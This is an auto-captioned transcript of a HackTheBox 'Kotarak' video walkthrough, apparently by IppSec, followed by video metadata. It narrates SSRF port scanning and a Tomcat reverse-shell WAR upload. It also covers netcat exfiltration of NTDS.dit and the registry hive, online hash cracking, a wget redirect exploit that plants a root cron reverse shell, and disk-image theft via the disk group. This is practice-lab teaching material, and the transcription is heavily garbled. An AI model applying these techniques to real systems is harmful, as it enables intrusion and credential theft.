HackTheBox - Kotarak

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

what's going on YouTube this is IPSec and when we doing Co turret from hack the box which is a box full of pivots I think a lot of people had trouble with two parts of this box the first being SSR f attack server site request forgery essentially the box has a script that just goes and downloads a web page and we can use that to kind of act like a proxy and download a bunch of pages off localhost which are not exposed through the firewall so this is a pretty cool attack that doesn't get a lot of publicity because it doesn't directly lead to code execution but there's a lot of times it leads to very sensitive file disclosure or code execution through other means I know there was a black hat talk from Orange sigh you can just Google lunch sigh SSR F and he chains like an SSR F four times doing protocol smuggling to get code execution and I think github enterprise which was amazing he had to go through a few SS or FS and eventually hit the memcache service and execute code off that I believe the second part that gives people trouble is just listening on port 80 because to get root you have to exploit W get which is doing a request to port 80 and unprivileged users can't listen on port 80 by default so there's something install in the box that lets you do that caught off bind and we'll get into that too listen on port 80 and 21 to exploit W get which just gets us actual route on this box so let's jump in to start things off let's do the normal and maps OS seed for default scripts SV and write versions o a I'll put all formats the directory might throw it in is n map and we'll call this initial and then the IP address of keturah quit is 1010 1055 or in that so let's just look at the results and we see four ports open we got 22 eight thousand nine and 8080 actually three ports I can't count and 80 80 is Tomcat we have Apache j-serve on 8009 which I believe is related to Tomcat so let's just try going to Tomcat so 10 10 10 55 80 80 and we just get a 404 I know a lot of Tomcats throw things in slash manager slash HTML so I'm not even gonna bother der busting less and we get a username password prompt try a few defaults like Tomcat Tomcat Tomcat secret with threes instead of ease don't get anything and I'm not gonna go too much more into that because it's got some type of thing that will lock the account if I try too much so that's why I'm even gonna skip setting up a Hydra to go in the background because again I don't want to walk any accounts so the next step will be to do a full port scan so nmap - p - and then - oh eh - output all formats and map all ports and the IP address of 10-10-10 55 and the reason why i don't start off with all ports is because it can take a while depending on the box configured so I always just do the basic ports and then set all ports and the background while I work we see it has one additional port so I'm not going to bother running a full scan against this again because we can just test out one port it's listening on port 60,000 so if we go to port 6 0 or 60,000 we get welcome to Catterick web hosting private browser use this private browser to surf the web and honestly please don't abuse it so my first step will be to set up a web server on my local host and see if this page accesses it so python - m simple HTTP server and I'm also going to split my window and do a if config tun 0 to get my IP address 10 10 14 3 so let's go here and specify HTTP 10 10 14 3 don't see anything there and we didn't get anything here again I didn't realize I'm listening on port 80 or 8000 so let's go back and do 8,000 we just get a directory listing so we do hit it and we don't have a user agent on this so if we have a user agent we could try to do some type of exploit since if it said like Firefox this version we know to search for exploits related to that Firefox version don't have anything so we're going to stop a HTTP server go back and then I'm gonna do other things SSO ref related so which I file : and we do Etsy passwd get a prompt that just says try harder so I'm gonna play with this a little bit please send this in to Boop so set my proxy set up to intercept send this request send the request to repeater and all I want to say in the path is file and I get try harder so I'm going to do fil and the reason I'm doing this is maybe try harder is what happens when the command errors out so command shouldn't work with just fill and we don't get try harder so there's some type of regular expression searching for file so we can't use that if I change the cases maybe it's not a case insensitive search nope still that do it all caps still nothing so my next thing will be HTTP localhost and we'll do four six zero zero zero zero let's see if we get any response and we get the page back so I'm going to do a local port scan on this box of all ports 1 to 65535 to do that I'm gonna use a tool called W fuzz so if we do W fuzz - H I think will give us help I want to use - see I'll put with colors because colors are awesome I'm gonna use - Z with the range payload and I think that's it so we'll try that so if I do W fuzz - see for colors - Z range one to 65,535 that is all the tcp ports and then HTTP ten ten ten fifty-five 460-thousand /url dot PHP question mark path equals HTTP local host : fuzz in caps and we get a bunch of responses and this is the number of characters and there's two characters on like port five sixty so let's see what 560 says we get nothing so what I'm going to do is add another one - - h l equals two and that's going to hide everything that has this 2 CH and we'll game ports back so like 110 290 320 so if we go to 110 we get a page so we can launch some type of do a buster against this page we have 200 hello world 90 under construction so we're getting a lot of web servers right now 320 is the next one super sensitive login page maybe try like sequel injection against this page oh is that one eight eight eight simple File Viewer let's just render this and we have a few files backup blah is on tetris dot C so let's look at backup going back to raw table element so at once question mark doc equals backup so put a slash there and I think we're gonna have to go rel encode this cuz Apaches gonna get really confused when we have two question marks so you only cared that whole thing and we get a page with looks like the Tomcat configuration and admin with the password of three at pdh be estimation point so I'm going to copy this and we're gonna try logging in to Tomcat so we can just go to turn intercept off real quick 10 10 10 55 80 80 we need / manager slash HTML that's in my clipboard so admin and paste that in and we get the tomcat web manager so now we have to create a malicious Tomcat file or war file to upload here and give us a shell so let's do that and the reason why we can do this is because this is the tomcat web application manager so we can just upload a malicious web application that just has a hard shell hard-coded in it so that's what we're doing thankfully MSF venom has a bunch of payloads that will help us upload that war file it create the war file so do MSF mm - L to list all payloads and then once this finishes we can search for Java so search for Java and we have Java JSP shell reverse TCP this will allow us to create a war file that sends us a reverse shell back so du MSF venom - P Java JSP whatever you see that no host equals 10 10 14 3 L port equals we'll do 80 - f war and we'll call this epic war we're choosing war because this is what Tomcat wants so we wrote the file and now let's browse to deploy it so go to documents that's an it hard era no not that htb boxes Turek upset that were deploy it we have it there let's listen on port 80 and the reason why I always do like port 80 or 443 or something like that is it can be a bit annoying when I want to start yeah HTTP servers but if any port is allowed through a firewall it's generally gonna be that so if we just click on it SEC we get a connection back and this is a shell so Python C input PTY PTY not spawn then - so it controls e sty raw - echo FG and we have a real shell to this box so we're off the bat I notice backups so let's look in backups and then it looks like another directory backups so go on backups and we have Tomcat - users again look at this file permission denied ok let's go to our home directory this is the Tomcat let's check out slash home see if we can see anything there we do find dot just list all the files and we have Tomcat then to archive pentest data do an LS and we see two files a dot did file and a dot been and I see PS exec and NTDs this is stored on Windows Active Directory controllers it's what contains a Windows domain secret or it's the heard of Active Directory contains all Active Directory information group policies users etc including passwords so let's do a file star and we see the dot dit which is probably NTDs it is just data it doesn't have a magic button the second one that Ben is an MS registry file so since this is in pen test data I'm going to assume that this is the system hive file which contains the boot key that allows us to crypt the debt so let's start exfilling these files so we can do NC - LV NP won't say port 443 even though this isn't can be encrypted I'm going to call this system because that's what I think it's going to be so NC 10 10 10 10 10 14 3 then port 443 I never hit enter here and then direct this file into it connection saved we do file ok it has saved so the next one let's do NTDs not did and we want where's my net cat I'll just check that and see 10 10 14 3 4 4 3 and we're going to do the dot did file now and we got both of their smiles so we can do em packet - secret stump - H it's not too helpful I think it's - NTDs and then the file - system then the system registry hive file and then local I think that's the correct syntax and now there's gonna go and purse everything again it got the target boot key from that system file and then use that boot key to extract all the data out of NTDs dip this could take a few more seconds once it starts extracting hashes we know we're golden so we have a few hashes we have administrator guessed we've I don't care about guests these that end in this dollar sign or machine accounts and we'll have super strong passwords so we're gonna ignore those but I want at m'as administrator and care be TGT you're not gonna crack this password but if there's a Windows box then this is a golden ticket and which means you can just forge anything you can become anyone so since I see a bunch of window stuff let's go back over to a tomcat box the dmz coat arek box the reverse shell and do up - a this is gonna look at the ARP table and we can see what boxes are talking to it we do see 1003 133 so let's see if nmap is on the box it's apparently not nc NC on the box it looks like it is so we can do 1003 133 and 4 4 5 throw - be for verbose failed 3 3 8 9 failed 22.2 connects so the reason I was doing that is I was trying to figure out if the box code torque is talking to is a Windows box for Linux box if it's a Windows box we could just craft a golden ticket and then walk right in but since it's not we'll have to crack some hashes so copy this and we will delete the ones with that dollar sign okay we don't care about that oh we only care about two hashes so Oh - f separate by colon print think four yep and then let's just go to like hash killer and before we try to crack these manly always just run them through an online tool decrypt ntlm and always verify something like this is within scope because some people may not like you sending their hashes to third parties but we cracked - we got f16 tomcat and password one two three so let's try ssh into the box well we can yeah just throw up SSH so usernames we got from that was Athena's an administrator so I'm just gonna use Atma since administer is probably not a linux account name ata na s 10 10 10 55 make sure I copy that paste know we'll try password 1 2 3 now there's worked so let's try root didn't work mother's worked with SSH but let's go back here and do su so it looks like the admins user just can't SSH because I did f-16 Tomcat and logged right in to antennas so the next step is to go into his home directory and we have user dot txt and if we go to slash root we see that we can read the flag because we're the owner and we can also read app dot log and looking into app log we do see W get that looks like it's being ran every two minutes and it's a old version of W get W get 1.16 if we go over to her box we can do search point W get and see that we have a vulnerability for W get up 21.18 so I'm gonna do search boy - M - mirror this file and let us look at exactly what this does okay we're at the top background we got the introduction saying that W get can be tricked into saving a remote file supplied by the attacker and this attack is going to save the file dot W get RC which will allow us to get code execution the next time W get is ran so there's a lot of information about this attack and this attack does require both FTP and HTP so still talking about here we go here's the very beginning we have this cat and that end file so copy that we will go into dev sh m or no box paste I'm going to look at what we just pasted so we have the post powers Etsy shadow that's fine we can read the shadow file but the output document Etsy cron D W get root shell so this is the file we'll saving and we're saving a cron file so nothing we want to edit there or search for output document to get back to where we were and it wants us to start up a Python FTP server so what I'm gonna do real quick is fix my tty a little bit because I want to do another team ox so I think we have tea box running open terminal failed yep we do have tea muck so if I open up new terminal we can echo term so it doesn't know what type of terminal I'm using so if I export that now I should be able to go into team ox but I don't like how tea box is here I want this to be down a bit so you can change the columns I think Rose rose and we'll go to 40 we exit team Lux let's gets down a little bit more but I don't know what I want so you do the St - why - a in this terminal to see what it said at rows 39 column 79 that doesn't look right row 0 column 0 it says so dy rose 39 st to Y columns 79 and we'll try team-ups again still weird them looks fine so that's why I had to do I had to looking better now not exactly sure what I did but if you monkey around like I just did you'll get T MUX nested like I just did so since team looks is nested I can hit my team ox key which right now is control B twice and then control this session in here and the main reason I wanted to use T MUX in this is because a remote shell or a reverse shell is go doing port 8081 so if I wanted to get to connections to this box I would have to open up two different reverse shells and that means I have to upload two different reverse shells because my port is hard-coded so doing the nested T MUX just allows me to do everything off one session hopefully that makes sense it probably didn't but I'm fine with it so we have to get back to where the FTP was so Python - am I think we'll do it yep so if we copy this and if we had just pasted this in we get an error it's a permission denied because we can't listen on port 21 but this box has something called off by and installed if we just put off mine before that it lets us listen so let's rerun that Python with off bind and verify we have that W get RC file which we do and then the next thing we have to do is copy this W get or they copy the exploit script I've copied that and let's go over here we'll just call it X boy stop I do the right clipboard it looks like it's pasted so HTTP listen IP all my columns is weird as this as far as my cursor is going over so instead of mucking around with the columns portion of my tty I'm just going to do the exploit here and then we'll copy it in again wrong clipboard some reason have to do mode paste set paste that's the great command and we have to edit a few things this HTP listen IP we want this to be ten ten ten fifty five the IP of ko Tariq and the FTP as well so that's correct this route Crom I don't really care for just joining user bin ID and catting that to a file I want to get a reverse shell so I'm going to go to pen test monkey a reverse shell cheat sheet and normally I would do something like a ping first but because this is going on a cron which means there's a lot of waiting involved I'm just gonna jump the gun and go right for a ver shell so we're gonna put that to ten ten fourteen three which is my IP nor do port 8000 - so that looks fine glancing over this I don't see anything else we need a change so it's cat exploit copy paste the cat to make sure it looks fine it does and now we got to do all find Python exploit pie and we see it tested FTP and something came down here that said FTP session open so that worked and it's serving w get exploit on port 80 so the last thing to do is to see how long we'll have to be waiting for oh man there we go I had screwed up my team locks windows sometimes we nest team box it gets a bit wonky so if we go to slash root we can cat app dot log and CW get is running every two minutes 48 50 52 so we should wait about two minutes and hopefully we'll see something so I'm just gonna sleep 120 and then do some video editing magic to see or skip ahead in time because waiting two minutes is boring so it's been well over the two minutes and it should've ran so I'm gonna restart everything and we'll try again I'm not exactly sure why the server did it make a connection to us but maybe just something then start off correctly so let's try this again and instead of actually doing the exploit script I'm just going to do neck cat on port 80 to see if that server is still doing the W get request and it's just taking a variable out because the Python exploit script saying it's not working and it's relatively straightforward I believe so let's take a look at exploit dot PI while it's going so it's just starting up simple HTTP server upon a get request check if W get is in the user agent if it's not do nothing if W get is then upload dot W get or a C via the FTP redirect vulnerability and all that does is tell us W get there's a HTTP redirect which is a 301 and points it to the FTP server and we can see while I was explaining that we have the server hitting at via netcat so all mind works and it's getting a connection is repping user Espen I swear I just did it this before okay 10 10 10 - lets see 1003 one I want the issue is I'm listening on 10 10 10 55 and this has a interface on the 1003 Network so let's add it exploit PI and we're going to change HTTP listen IP 2 quad zeros and this was the problem I'm gonna cry so off blind Python exploit PI running so back to the explaining it we send a 301 redirect and point W get now at a FTP file and that just happily downloads whatever the redirect was then if the request is a post request again check W get and the header if W gets not in the header do nothing if it is in the header then the post request is going to be from the file we told it to download and we tell it to download a file in that dot W get our C file and then we will also tell it to create that cron job so in just a minute we should get a call back if that was the issue so hopefully it is now listening on all interfaces and if it was an issue with the interface we solved that problem so give it another 15 to 30 seconds and see if we get a call back there we go we got the first hit so it does have to be on quad zeros because I guess it's listening on a different interface but as you see we uploaded the dart W get or a C file actually in the slash root and it sent the redirect and we can see down here on our FTP that anonymous logs in and does download W get our C so in another two minutes it should do another request and this time the request will have the contents of the shadow file and it will also set up a cron job to send us a shell and I believe that was on port 8000 and two so NCL VMP eight thousand and two and we will wait another few minutes for the cron job to kick off so I did some editing magic and cut out a piece and there should be another W get requests starting almost immediately come on there we go and this time it's bro this time he gave us the contents of the shadow file and interesting enough the shadow file contained a Ubuntu user which is an honor box so this is definitely a VM and we just pivoted and accessed a command on probably the host but you can see that's the shadow file and then it said it cleared the cron job and it should kick off within the next minute so we'll just keep watching w a net cat on a host machine and once that minute finishes we should get a prompt saying well root on this box and there we go so we are now route if we do if config it's an S Pen if config this IP address is 1003 133 the host name is ko Tareq - int and over here the host name is ko Tariq - DMZ wait a second something doesn't line up because if this is the internal box and it's hosting LXE then this should have more interfaces because you need like a bridge interface and other things so did I miss something over here that's been I have config yeah so the DMZ is actually the host of this because we have a bunch of LXE bridges here these interfaces so we are routed here and if we do WCC root text we do get that but let us look more at this because if we have the root well we should be able to just hop in the container so oops we're not a member of LXE so let's yes EF grep lxc see if we can find anything I don't see the location is it lib lxc permission denied but looking back at the groups I am a member of disk so that is another good group to be a member of so if we do LX la /dev SD SD star I think we can see I have readwrite access to SD Asda 1 2 & 5 so let's look at which one of those I am mounted to and a lot of Alexi stuff I hate this little break but since I'm doing neccessity MUX I don't think I can make that bigger without playing with SD - why columns and all that so I don't want to do that my clear yes mount or on let's mount - V oh I see oh that's why I'm looking for so dev mapper Katara - VGA and that is symlink - over to dev mapper dm0 or a dev DM 0-0 ok so I'm going to strings this file to see if I can read it I can so the next step is to neck cap this over to me so there's gonna be a much like the mirai machine so NC l v NP will say 8,000 - and on this box we're going to do a let's see do we have DC FL nope we have DD we do have DD so I can do i F equals 4 input file /dev DD - 0 is what we said what do we say it was crap it's early or late have you want to look at it mapper osj rhetoric DM it's DM isn't it yeah dm0 okay bear with me this will work so DD i f equals dm/dt row input file and then we're not going to specify an output file we're just gonna pipe this over to gzip and this is going to zip standard in or stand it out and fight back to the terminal and we're going to send that to me so I use the same port will do 8003 that's got a cron job running on it so okay do this fix the IP and I forgot something and that's gonna screw up my terminal may be clear nope make mistakes left right so we do disk image GZ okay now it's sending so what we just did is we had DD to take an image of the block device DM - 0 we're zipping it up because well we're taking a block device and have a lot of zeros and that compresses very well we don't want to send a bunch of gigabytes down the wire if we don't have to if we don't have the gzip then the blocks that are just straight zeros aka not written to yet will get sent over the wire so this fixes that and compresses other stuff so it's gonna make the image a bit smaller one thing I should have done is looked at the size of this before copying it down the wire but which soon I'll have enough space and the final thing is we pipe this over to netcat because I want to send this to me so we're just sending the zipped disk image over to my net cat which is piping it to a file so if I open a new window I can do a file on disk IMG GZ and I see it is gzip compressed data so if we do a D ughs disk image gun zip or GZ we see it's a hundred and thirty three Meg's right now so we're just going to let this go I'm gonna pause the video because this could take a while to copy however big this VM is down but once we copy the VM then we should be able to go into that for a Lib Aleksey directory because we're the root of this system so hopefully I don't make sense once we do it it's probably been about 20 minutes of uploading the image to my box but it is done so we can do it to you - HS on disk image GZ we see it is 2.2 gigs and the disk image itself was 7.5 gigs so the compression did help quite a bit so the next step is to uncompress it which again is gonna take a while so I will put the video back on pause because I'm guessing this can be probably 5 or 10 minutes to decompress this image so I'll see you guys in a second the gun zips now finished it's definitely taking that long at all so if we do a file on disk image we do see it is a Linux file system with needs general coveri extents large files huge files but we're not gonna really worry about that we're just gonna do mount disk image and then /mnt and see if this mounts it looks like it did I even saw something pop up right here but if we CD into mount we can then go into root and I think this is the flag that's only one byte flag dark text so this is oh oh I am glad that wasn't the flag because that is one line I'm so used to doing WC - I'll go to count lines I sure did WC - see to see if it was safe but no 66 that's not 33 so we know that's not the flag so the directory I wanted to go to would be var Lib LX e I believe now we can go to Co Tariq - int and if you're wondering under these directories it's because well we did this and Calamity just a little bit of a different way going to root FS then root WC - C naught L root dot txt and we can get the flag that way we could also see things like Etsy cat - shadow and potentially crack the Ubuntu password and if we cracked that you monkey password we may have been old just SSH right in so if we let's see up - a/c who is my neighbor user Espen - guy that's really nice did you see what just happened I did up - a it says it's not available but it is located an end user Espen so you may want to go run that that's awesome so let's see can we ssh to this fun - yes we can see you I know this password is it f16 tomcat now is it the root password of Atanas that i just magically know it is not so if we had cracked that Ubuntu password then we would be able to get into the machine but to get what we need we just needed the flag which we're able to retrieve from the disk image additionally you may be able to write to the file system sneekly since we do have readwrite on dev dm0 yeah we do have readwrite there so we may be able to write to that disk and not cause any damage to the OS to give us root permission or do things like write a cron so some things to think about you should never give users access to that disk group because having read access to block devices is bad and that will conclude the video I hope you guys enjoyed and I will see you next week

Info

Channel: IppSec

Views: 25,850

Rating: undefined out of 5

Keywords: SSRF, ServerSide Request Forgery, wfuzz, tomcat, Linux Disk Group, ntds, wget exploit, authbind, ippsec, htb, Hack The Box, HackTheBox, wgetrc, wget, impacket, secretsdump

Id: 38e-sxPWiuY

Channel Id: undefined

Length: 51min 37sec (3097 seconds)

Published: Sat Mar 10 2018